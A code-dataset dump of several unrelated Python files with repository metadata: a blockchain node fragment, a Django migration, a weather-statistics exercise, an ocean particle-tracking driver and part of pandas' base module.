break
next_ses_height = ses_height[idx + 1]
# start_ses_hash
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
                    # otherwise add an extra sub-epoch summary, since the requested start <-> end range spans two sub-epochs
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| true
| true
|
790da6c31447b466d9cc6aace31cb537caffffd7
| 2,357
|
py
|
Python
|
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
apps/amcm/migrations/0032_auto_20220104_0437.py
|
agsneutron/asociacion_mexicana_cuarto_milla
|
4657e1f494eb572e9b40b2804e012cdfd6193c51
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.8 on 2022-01-04 10:37
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('amcm', '0031_auto_20220104_0431'),
]
operations = [
migrations.AddField(
model_name='eventoelegibles',
name='evento',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='amcm.evento'),
preserve_default=False,
),
migrations.AlterField(
model_name='credito',
name='fecha_pago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977886, tzinfo=utc), null=True, verbose_name='Fecha de pago'),
),
migrations.AlterField(
model_name='credito',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977861, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='cuentaspago',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 961284, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='elegible',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 962608, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='pago',
name='fechaPago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959833, tzinfo=utc), null=True, verbose_name='Fecha del Pago'),
),
migrations.AlterField(
model_name='pago',
name='fechaRegistro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959863, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='recibo',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 976856, tzinfo=utc), verbose_name='Fecha de registro'),
),
]
| 40.637931
| 159
| 0.614765
|
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('amcm', '0031_auto_20220104_0431'),
]
operations = [
migrations.AddField(
model_name='eventoelegibles',
name='evento',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='amcm.evento'),
preserve_default=False,
),
migrations.AlterField(
model_name='credito',
name='fecha_pago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977886, tzinfo=utc), null=True, verbose_name='Fecha de pago'),
),
migrations.AlterField(
model_name='credito',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 977861, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='cuentaspago',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 961284, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='elegible',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 962608, tzinfo=utc), verbose_name='Fecha de registro'),
),
migrations.AlterField(
model_name='pago',
name='fechaPago',
field=models.DateField(blank=True, default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959833, tzinfo=utc), null=True, verbose_name='Fecha del Pago'),
),
migrations.AlterField(
model_name='pago',
name='fechaRegistro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 959863, tzinfo=utc), verbose_name='Fecha de Registro'),
),
migrations.AlterField(
model_name='recibo',
name='fecha_registro',
field=models.DateField(default=datetime.datetime(2022, 1, 4, 10, 37, 3, 976856, tzinfo=utc), verbose_name='Fecha de registro'),
),
]
| true
| true
|
790da6f58ba37152bebfc637af2c6cf00f701207
| 1,715
|
py
|
Python
|
gautools/__init__.py
|
thompcinnamon/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | null | null | null |
gautools/__init__.py
|
thompcinnamon/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | 2
|
2018-07-18T19:53:08.000Z
|
2019-02-25T23:25:51.000Z
|
gautools/__init__.py
|
theavey/QM-calc-scripts
|
60b06e14b2efd307d419201079bb24152ab0bd3c
|
[
"Apache-2.0"
] | 1
|
2017-01-04T20:50:21.000Z
|
2017-01-04T20:50:21.000Z
|
"""This is a set of tools built up over time for working with Gaussian and
QChem input and output."""
########################################################################
# #
# #
# This script was written by Thomas Heavey in 2017. #
# theavey@bu.edu thomasjheavey@gmail.com #
# #
# Copyright 2017 Thomas J. Heavey IV #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
########################################################################
pass
| 61.25
| 74
| 0.348105
| true
| true
|
|
790da99041289e9e42219eef39722619d6f10b57
| 3,222
|
py
|
Python
|
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/weather_master/weather_master.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
"""
File: weather_master.py
Name: Claire Lin
-----------------------
This program should implement a console program
that asks weather data from user to compute the
average, highest, lowest, cold days among the inputs.
Output format should match what is shown in the sample
run in the Assignment 2 Handout.
"""
EXIT = -100
def main():
"""
    Find the highest and lowest temperatures, the number of cold days, and the average.
"""
print('stanCode \"Weather Master 4.0\"!')
    # my friend told me the maximum and minimum variables can be set like this.
maximum = -100000000
minimum = 100000000
total = 0
count = 0
cold_day = 0
while True:
temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
        # Jump out of the program when no temperatures were entered.
if temperature == EXIT and count == 0:
print('No temperatures were entered.')
break
        # Exclude temperatures that cannot exist.
        if temperature > 90 or temperature < -100:
            print('>>> The temperature \"'+str(temperature)+'\" cannot exist, so we exclude it and stop.')
break
if temperature == EXIT:
break
else:
count += 1 # count the total days.
if temperature < 16:
cold_day += 1 # count the cold days which temperature below 16.
            total += temperature  # add this temperature to the running total.
if temperature > maximum:
maximum = temperature
if temperature < minimum:
minimum = temperature
else:
pass
if count != 0:
avg = total / count
print("")
print('Highest temperature = ' + str(maximum))
print('Lowest temperature = ' + str(minimum))
print('Average = '+str(avg))
print(str(cold_day) + ' cold day(s)')
# For checking
# print(total)
# print(count)
"""
My note:
This is the first try, when I debug I found the calculation logic is wrong.
The first variable I type will disappear when it enter into the while loop. And the count of
total days would include the EXIT constant.
"""
# if temperature == EXIT:
# print('No temperatures were entered.')
#
# else:
# while True:
# # if temperature < 16:
# # cold_day += 1
#
# temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
#
# # count the total days.
# count += 1
#
# if temperature == EXIT:
# break
#
# total += temperature
# if temperature > maximum:
# maximum = temperature
# elif temperature < minimum:
# minimum = temperature
# else:
# pass
#
# avg = total / count
# print('Highest temperature = ' + str(maximum))
# print('Lowest temperature = ' + str(minimum))
# print('Average = '+str(avg))
# print(str(cold_day) + ' cold day(s)')
###### DO NOT EDIT CODE BELOW THIS LINE ######
if __name__ == "__main__":
main()
| 28.513274
| 103
| 0.543451
|
EXIT = -100
def main():
print('stanCode \"Weather Master 4.0\"!')
maximum = -100000000
minimum = 100000000
total = 0
count = 0
cold_day = 0
while True:
temperature = int(input('Next Temperature: (or '+str(EXIT) + ' to quit)? '))
if temperature == EXIT and count == 0:
print('No temperatures were entered.')
break
if temperature > 90 or temperature < -100:
            print('>>> The temperature \"'+str(temperature)+'\" cannot exist, so we exclude it and stop.')
break
if temperature == EXIT:
break
else:
count += 1
if temperature < 16:
cold_day += 1
total += temperature
if temperature > maximum:
maximum = temperature
if temperature < minimum:
minimum = temperature
else:
pass
if count != 0:
avg = total / count
print("")
print('Highest temperature = ' + str(maximum))
print('Lowest temperature = ' + str(minimum))
print('Average = '+str(avg))
print(str(cold_day) + ' cold day(s)')
| true
| true
|
790da9f977709c1b0764594562bf1b2cb0f52777
| 9,682
|
py
|
Python
|
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
tracker/tracker/user_tracker.py
|
PuffyPuffin/LO_user
|
c7cafc2045b027aad0098d034cbe2b70126c8379
|
[
"MIT"
] | null | null | null |
"""
Code for particle tracking, designed for ROMS output. This new version
makes extensive use of nearest-neighbor KDTree algorithms for interpolation.
This results in significantly (36x) faster runtimes compared with the old version.
PERFORMANCE: about 3 minutes per day for a 3D cas6 experiment with 10k particles.
NOTE: You have to have run make_KDTrees.py for the grid (e.g. cas6) before running.
NOTE: There is some issue, perhaps with garbage collection, which causes
the loading of NetCDF files to happen slower after running a few times
interactively from ipython. It appears that this can be avoided by running
from the terminal as: python tracker.py [args].
This program is a driver where you specify:
- an experiment (ROMS run + release locations + other choices)
- a release or set of releases within that experiment (start day, etc.)
The main argument you provide is -exp, which is the experiment name, and
is used by experiments.get_exp_info() and .get_ic() to get the gtagex and initial particle
locations. Other possible command line arguments and their defaults
are explained in the argparse section below.
NOTE: To improve usefulness for people other than me, this driver will
first look for:
- LiveOcean_user/tracker/user_trackfun.py
before loading my versions.
This allows you to create your own modifications to the tracking
(e.g. for diurnal depth behavior) while still being able to use git pull to update the main code.
It can be run on its own, or with command line arguments to facilitate
large, automated jobs, for example:
Examples:
python tracker.py -clb True
The same command, with all the arguments typed explicitly instead of taken as defaults:
python tracker.py -gtx cas6_v3_lo8b -ro 2 -d 2019.07.04 -exp jdf0 -clb True
"""
import sys
from datetime import datetime, timedelta
from time import time
import argparse
import numpy as np
from lo_tools import Lfun, zfun
Ldir = Lfun.Lstart()
from importlib import reload
pth = Ldir['LOu'] / 'tracker'
if str(pth) not in sys.path:
sys.path.append(str(pth))
import experiments as exp
reload(exp)
import trackfun_nc as tfnc
reload(tfnc)
# The import of trackfun or user_trackfun is done later in this program,
# about 100 lines down.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# command line arguments, can be input in any order
parser = argparse.ArgumentParser()
# Set the experiment name
# (details set in experiments.py, or, if it exists, user_experiments.py)
parser.add_argument('-gtx', '--gtagex', default='cas6_v0_live', type=str)
parser.add_argument('-ro', '--roms_out_num', default=2, type=int)
# 1 = Ldir['roms_out1'], etc.
# this is the first starting day
parser.add_argument('-d', '--date_string', default='2021.10.15', type=str)
parser.add_argument('-exp', '--exp_name', default='elb', type=str)
parser.add_argument('-clb', '--clobber', default=False, type=zfun.boolean_string)
# overwrite existing output folder if clobber == True
parser.add_argument('-sub_tag', default='', type=str)
# append an optional tag to the end of the output folder name
# These are False unless the flags are used with the argument True
# so if you do NOT use these flags the run will be:
# - trapped to the surface
# - no vertical turbulent diffusion
parser.add_argument('-3d', default=False, type=zfun.boolean_string) # do 3d tracking
parser.add_argument('-laminar', default=False, type=zfun.boolean_string) # no turbulence
parser.add_argument('-no_advection', default=False, type=zfun.boolean_string) # no advection
parser.add_argument('-sink', default=0, type=float) # particle sinking speed (m per day, e.g. 40)
# windage = a small number: 0 <= windage << 1 (e.g. 0.03)
# fraction of windspeed added to advection, only for 3d=False
parser.add_argument('-wnd', '--windage', default=0, type=float)
# You can make multiple releases using:
# number_of_start_days > 1 & days_between_starts, and which hour (UTC) to start on
parser.add_argument('-nsd', '--number_of_start_days', default=1, type=int)
parser.add_argument('-dbs', '--days_between_starts', default=1, type=int)
parser.add_argument('-dtt', '--days_to_track', default=1, type=int)
parser.add_argument('-sh', '--start_hour', default=0, type=int)
# number of divisions to make between saves for the integration
# e.g. if ndiv = 12 and we have hourly saves, we use a 300 sec step
# for the integration. 300 s seems like a good default value,
# based on Banas et al. (2009, CSR RISE paper).
parser.add_argument('-ndiv', default=12, type=int)
parser.add_argument('-sph', default=1, type=int)
# sph = saves per hour, a new argument to allow more frequent writing of output.
args = parser.parse_args()
TR = args.__dict__
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# set where to look for model output
if args.roms_out_num == 0:
TR['roms_out'] = Ldir['roms_out']
elif args.roms_out_num > 0:
TR['roms_out'] = Ldir['roms_out' + str(args.roms_out_num)]
# set dependent and default fields
TR['turb'] = False
# make sure sph is no greater than ndiv
TR['sph'] = np.min((TR['sph'],TR['ndiv']))
# overrides
if TR['3d']:
TR['windage'] = 0
TR['turb'] = True # default is that 3d is always turbulent
if TR['laminar']:
TR['turb'] = False
# get experiment info
TR['gridname'], TR['tag'], TR['ex_name'] = TR['gtagex'].split('_')
# pass some info to Ldir
Ldir['gtagex'] = TR['gtagex']
Ldir['roms_out'] = TR['roms_out']
# get the full path to a valid history file
fn00 = Ldir['roms_out'] / TR['gtagex'] / ('f' + TR['date_string']) / 'ocean_his_0001.nc'
TR['fn00'] = fn00
# set the name of the output folder
out_name = TR['exp_name']
# modify the output folder name, based on other choices
if TR['3d']:
out_name += '_3d'
elif not TR['3d']:
out_name += '_surf'
if TR['laminar']:
out_name += '_laminar'
if TR['windage'] > 0:
out_name += '_wind' + str(int(100*TR['windage']))
if TR['start_hour'] > 0:
out_name += '_sh' + str(int(TR['start_hour']))
if TR['sink'] > 0:
out_name += '_sink' + str(int(TR['sink']))
if TR['no_advection'] == True:
out_name += '_nadv'
if TR['ndiv'] != 12: # only mention ndiv if it is NOT 12
out_name += '_ndiv' + str(TR['ndiv'])
if len(TR['sub_tag']) > 0:
out_name += '_' + TR['sub_tag']
# make the list of start days (datetimes) for separate releases
idt_list = []
dt = datetime.strptime(TR['date_string'], '%Y.%m.%d')
for nic in range(TR['number_of_start_days']):
idt_list.append(dt)
dt = dt + timedelta(TR['days_between_starts'])
# make the output directory (empty)
outdir0 = Ldir['LOo'] / 'tracks'
outdir1 = out_name
outdir = outdir0 / outdir1
if outdir.is_dir():
if args.clobber:
pass # continue and overwrite if clobber is True
else:
print('Warning: output directory exists - rename if you want to keep it!!')
print('-- tracker run not started --')
sys.exit()
Lfun.make_dir(outdir, clean=True)
print(50*'*' + '\nWriting to ' + str(outdir))
sys.stdout.flush()
# Write some info to outdir0 for use by trackfun.py
Lfun.dict_to_csv(TR, outdir0 / 'exp_info.csv')
# and write the same info to outdir as part of the archived run output
Lfun.dict_to_csv(TR, outdir / 'exp_info.csv')
# Load the trackfun module.
# NOTE: we have to load this module AFTER we write [outdir0]/exp_info.csv
# because it uses that information to decide which KDTrees to load. Crude.
if (Ldir['LOu'] / 'tracker' / 'user_trackfun.py').is_file():
sys.path.append(str(Ldir['LOu'] / 'tracker'))
import user_trackfun as tfun
else:
import trackfun as tfun
reload(tfun)
# get the initial particle location vectors
EI = exp.get_exp_info(TR['exp_name'])
plon00, plat00, pcs00 = exp.get_ic(EI, TR['fn00'])
# step through the releases, one for each start day
write_grid = True
for idt0 in idt_list:
tt0 = time() # monitor integration time
# name the release file by start day
idt0_str = datetime.strftime(idt0,'%Y.%m.%d')
outname = ('release_' + idt0_str + '.nc')
print('-- ' + outname)
sys.stdout.flush()
out_fn = outdir / outname
# we do the calculation in one-day segments, but write complete
# output for a release to a single NetCDF file.
for nd in range(TR['days_to_track']):
# get or replace the history file list for this day
idt = idt0 + timedelta(days=nd)
idt_str = datetime.strftime(idt,'%Y.%m.%d')
print(' - working on ' + idt_str)
sys.stdout.flush()
fn_list = tfun.get_fn_list(idt, Ldir)
# write the grid file (once per experiment) for plotting
if write_grid == True:
g_infile = fn_list[0]
g_outfile = outdir / 'grid.nc'
tfnc.write_grid(g_infile, g_outfile)
write_grid = False
# DO THE TRACKING
if nd == 0: # first day
# set IC
plon0 = plon00.copy()
plat0 = plat00.copy()
pcs0 = pcs00.copy()
# do the tracking
if TR['start_hour'] > 0:
fn_list = fn_list[TR['start_hour']:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR, trim_loc=True)
# save the results to NetCDF
tfnc.start_outfile(out_fn, P)
else: # subsequent days
# set IC
plon0 = P['lon'][-1,:]
plat0 = P['lat'][-1,:]
pcs0 = P['cs'][-1,:]
# do the tracking
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR)
tfnc.append_to_outfile(out_fn, P)
print(' - Took %0.1f sec for %s day(s)' %
(time() - tt0, str(TR['days_to_track'])))
print(50*'=')
print(50*'*' + '\nWrote to ' + str(outdir))
| 35.465201
| 97
| 0.673001
|
import sys
from datetime import datetime, timedelta
from time import time
import argparse
import numpy as np
from lo_tools import Lfun, zfun
Ldir = Lfun.Lstart()
from importlib import reload
pth = Ldir['LOu'] / 'tracker'
if str(pth) not in sys.path:
sys.path.append(str(pth))
import experiments as exp
reload(exp)
import trackfun_nc as tfnc
reload(tfnc)
parser = argparse.ArgumentParser()
parser.add_argument('-gtx', '--gtagex', default='cas6_v0_live', type=str)
parser.add_argument('-ro', '--roms_out_num', default=2, type=int)
parser.add_argument('-d', '--date_string', default='2021.10.15', type=str)
parser.add_argument('-exp', '--exp_name', default='elb', type=str)
parser.add_argument('-clb', '--clobber', default=False, type=zfun.boolean_string)
parser.add_argument('-sub_tag', default='', type=str)
parser.add_argument('-3d', default=False, type=zfun.boolean_string)
parser.add_argument('-laminar', default=False, type=zfun.boolean_string)
parser.add_argument('-no_advection', default=False, type=zfun.boolean_string)
parser.add_argument('-sink', default=0, type=float)
parser.add_argument('-wnd', '--windage', default=0, type=float)
parser.add_argument('-nsd', '--number_of_start_days', default=1, type=int)
parser.add_argument('-dbs', '--days_between_starts', default=1, type=int)
parser.add_argument('-dtt', '--days_to_track', default=1, type=int)
parser.add_argument('-sh', '--start_hour', default=0, type=int)
parser.add_argument('-ndiv', default=12, type=int)
parser.add_argument('-sph', default=1, type=int)
args = parser.parse_args()
TR = args.__dict__
if args.roms_out_num == 0:
TR['roms_out'] = Ldir['roms_out']
elif args.roms_out_num > 0:
TR['roms_out'] = Ldir['roms_out' + str(args.roms_out_num)]
TR['turb'] = False
TR['sph'] = np.min((TR['sph'],TR['ndiv']))
if TR['3d']:
TR['windage'] = 0
TR['turb'] = True
if TR['laminar']:
TR['turb'] = False
TR['gridname'], TR['tag'], TR['ex_name'] = TR['gtagex'].split('_')
Ldir['gtagex'] = TR['gtagex']
Ldir['roms_out'] = TR['roms_out']
fn00 = Ldir['roms_out'] / TR['gtagex'] / ('f' + TR['date_string']) / 'ocean_his_0001.nc'
TR['fn00'] = fn00
out_name = TR['exp_name']
if TR['3d']:
out_name += '_3d'
elif not TR['3d']:
out_name += '_surf'
if TR['laminar']:
out_name += '_laminar'
if TR['windage'] > 0:
out_name += '_wind' + str(int(100*TR['windage']))
if TR['start_hour'] > 0:
out_name += '_sh' + str(int(TR['start_hour']))
if TR['sink'] > 0:
out_name += '_sink' + str(int(TR['sink']))
if TR['no_advection'] == True:
out_name += '_nadv'
if TR['ndiv'] != 12:
out_name += '_ndiv' + str(TR['ndiv'])
if len(TR['sub_tag']) > 0:
out_name += '_' + TR['sub_tag']
idt_list = []
dt = datetime.strptime(TR['date_string'], '%Y.%m.%d')
for nic in range(TR['number_of_start_days']):
idt_list.append(dt)
dt = dt + timedelta(TR['days_between_starts'])
outdir0 = Ldir['LOo'] / 'tracks'
outdir1 = out_name
outdir = outdir0 / outdir1
if outdir.is_dir():
if args.clobber:
pass
else:
print('Warning: output directory exists - rename if you want to keep it!!')
print('-- tracker run not started --')
sys.exit()
Lfun.make_dir(outdir, clean=True)
print(50*'*' + '\nWriting to ' + str(outdir))
sys.stdout.flush()
Lfun.dict_to_csv(TR, outdir0 / 'exp_info.csv')
Lfun.dict_to_csv(TR, outdir / 'exp_info.csv')
if (Ldir['LOu'] / 'tracker' / 'user_trackfun.py').is_file():
sys.path.append(str(Ldir['LOu'] / 'tracker'))
import user_trackfun as tfun
else:
import trackfun as tfun
reload(tfun)
EI = exp.get_exp_info(TR['exp_name'])
plon00, plat00, pcs00 = exp.get_ic(EI, TR['fn00'])
write_grid = True
for idt0 in idt_list:
tt0 = time()
idt0_str = datetime.strftime(idt0,'%Y.%m.%d')
outname = ('release_' + idt0_str + '.nc')
print('-- ' + outname)
sys.stdout.flush()
out_fn = outdir / outname
for nd in range(TR['days_to_track']):
idt = idt0 + timedelta(days=nd)
idt_str = datetime.strftime(idt,'%Y.%m.%d')
print(' - working on ' + idt_str)
sys.stdout.flush()
fn_list = tfun.get_fn_list(idt, Ldir)
if write_grid == True:
g_infile = fn_list[0]
g_outfile = outdir / 'grid.nc'
tfnc.write_grid(g_infile, g_outfile)
write_grid = False
if nd == 0:
plon0 = plon00.copy()
plat0 = plat00.copy()
pcs0 = pcs00.copy()
if TR['start_hour'] > 0:
fn_list = fn_list[TR['start_hour']:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR, trim_loc=True)
tfnc.start_outfile(out_fn, P)
else:
plon0 = P['lon'][-1,:]
plat0 = P['lat'][-1,:]
pcs0 = P['cs'][-1,:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR)
tfnc.append_to_outfile(out_fn, P)
print(' - Took %0.1f sec for %s day(s)' %
(time() - tt0, str(TR['days_to_track'])))
print(50*'=')
print(50*'*' + '\nWrote to ' + str(outdir))
| true
| true
|
790daa7e42b3981224910e6c988de58eb9912933
| 38,591
|
py
|
Python
|
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Base and utility classes for pandas objects.
"""
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
"""
    Base class for various pandas objects.
"""
# results from calls to methods decorated with cache_readonly get added to _cache
_cache: dict[str, Any]
@property
def _constructor(self):
"""
        Class constructor (for this class it's just `__class__`).
"""
return type(self)
def __repr__(self) -> str:
"""
Return a string representation for a particular object.
"""
# Should be overwritten by base classes
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
"""
Reset cached properties. If ``key`` is passed, only clears that key.
"""
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
"""
Generates the total memory usage for an object that returns
either a value or Series of values
"""
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
# no memory_usage attribute, so fall back to object's 'sizeof'
return super().__sizeof__()
class NoNewAttributesMixin:
"""
Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
    call to `self._freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
"""
def _freeze(self):
"""
Prevents setting additional attributes.
"""
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
"""
    Mixin implementing the selection & aggregation interface on a group-like
    object; sub-classes need to define: obj, exclusions.
"""
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
            # equivalent to `self.obj.drop(self.exclusions, axis=1)`
# but this avoids consolidating and making a copy
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
"""
Common ops mixin to support a unified interface / docs for Series / Index
"""
# ndarray compatibility
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"] # tolist is not deprecated, just suppressed in the __dir__
)
@property
def dtype(self) -> DtypeObj:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
"""
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
"""
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
"""
Return a tuple of the shape of the underlying data.
"""
return self._values.shape
def __len__(self) -> int:
# We need this defined here for mypy
